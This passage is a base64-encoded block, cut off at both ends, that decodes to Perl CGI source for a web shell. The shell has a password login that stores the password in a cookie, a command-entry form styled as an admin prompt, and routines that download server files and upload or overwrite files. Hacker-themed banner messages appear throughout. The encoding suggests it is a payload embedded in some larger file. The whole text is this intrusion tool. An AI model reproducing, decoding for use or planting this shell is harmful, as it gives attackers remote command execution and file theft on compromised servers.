lcnZlciAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuPC9mb250PiA8YnI+Cgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgoKPGZvbnQgY29sb3I9IiNGMDAwMDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+XCQgQ29ubmVjdGVkIENvbW1hbmQhIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+CjwvdHI+CjwvdGJvZHk+PC90YWJsZT4KPGJyPgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsKVHlwaW5nVGV4dC5ydW5BbGwoKTsKCjwvc2NyaXB0PgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsKCW15ICR0ZXh0ID0gc2hpZnQ7CgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsKCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsKCSR0ZXh0ID1+IHMvJy8mIzAzOTsvZzsKCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7CgkkdGV4dCA9fiBzLz4vJmd0Oy9nOwoJcmV0dXJuICR0ZXh0Owp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBBZGQgbGluayBmb3IgZGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEFkZExpbmtEaXIoJCkKewoJbXkgJGFjPXNoaWZ0OwoJbXkgQGRpcj0oKTsKCWlmKCRXaW5OVCkKCXsKCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOwoJfWVsc2UKCXsKCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOwoJfQoJbXkgJHBhdGg9IiI7CglteSAkcmVzdWx0PSIiOwoJZm9yZWFjaCAoQGRpcikKCXsKCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsKCQkkcmVzdWx0Lj0iPGEgaHJlZj0nP2E9Ii4kYWMuIiZkPSIuJHBhdGguIic+Ii4kXy4kUGF0aFNlcC4iPC9hPiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGJyPkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KClBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRm9ybQp7CglwcmludCA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2FpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9nb3V0CnsKCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUKCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCSZQcmludExvZ291dFNjcmVlbjsKCgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7CglleGl0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdAojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0CiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyCiMgdG8gbG9naW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ2luIAp7CglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZAoJewoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7CgkJJlByaW50UGFnZUhlYWRlcjsKCQlwcmludCAmTGlzdERpcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoKCQl9CgkJJlByaW50TG9naW5Gb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJZXhpdDsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgokUHJvbXB0CjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI1MCIgbmFtZT0iYyI+CjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQp7CglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IAoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+CiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IGNsYXNzPSJmaWxlIiB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+Cgo8L2Zvcm0+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0KewoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOwoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CiRQcm9tcHQgdXBsb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCBjbGFzcz0iZmlsZSIgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+ClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4KCjwvZm9ybT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBDb21tYW5kVGltZW91dAp7CglpZighJFdpbk5UKQoJewoJCWFsYXJtKDApOwoJCXJldHVybiA8PEVORDsKPC90ZXh0YXJlYT4KPGJyPjxmb250IGNvbG9yPXllbGxvdz4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLjwvZm9udD4KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250PgpFTkQKCX0KfQoKCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXIKIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gKIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5LgojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQp7Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsKCW15ICRyZXN1bHQ9IiI7CglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMKCXsKCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsKCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkcmVzdWx0IC49IDw8RU5EOwpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPgpFTkQKCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJfQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdAoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSRyZXN1bHQgLj0gJlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbXkgJHJlc3VsdCA9ICIiOwoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJCWV4aXQoMSk7Cgl9CgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsKCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOwoKCX0KCW15ICRyZXN1bHQ9IiI7CgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJJHJlc3VsdCAuPSAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOwoJfQoJZWxzZSAjIGZpbGU